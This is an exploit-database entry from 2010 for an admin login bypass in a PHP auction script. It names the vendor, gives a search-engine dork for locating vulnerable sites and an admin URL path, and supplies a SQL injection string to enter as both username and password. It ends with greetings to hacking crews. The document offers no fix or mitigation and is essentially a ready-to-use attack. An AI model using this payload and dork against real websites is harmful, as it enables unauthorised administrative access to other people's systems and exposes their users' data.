Auction_Software Script - Admin Authentication Bypass

EDB-ID:

14247

CVE:

N/A

Author:

ALTBTA

Type:

webapps

Platform:

PHP

Published:

2010-07-06

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :  Auction_Software Script Admin Login Bypass vulnerability
vendor URL :http://www.brotherscripts.com/
Price:  $24.95
Author : altbta <l_9[at]hotmail.com>
dork : "PHPAuction GPL Enhanced V2.51 by AuctionCode.com"

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Xploit : Auth Bypass
Demo :
http://www.site.com/demos/Auction_Software/admin/

UserName: ' or 1=1 or ''='

Password: ' or 1=1 or ''='


1-=-=-=-=-=-=-=-=-=-=-=-=-=-= (altbta) =-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
greetz to : RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V !
V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & R3d-D3v!L & MN9

xp10.me/xp10 & v4-team.com/cc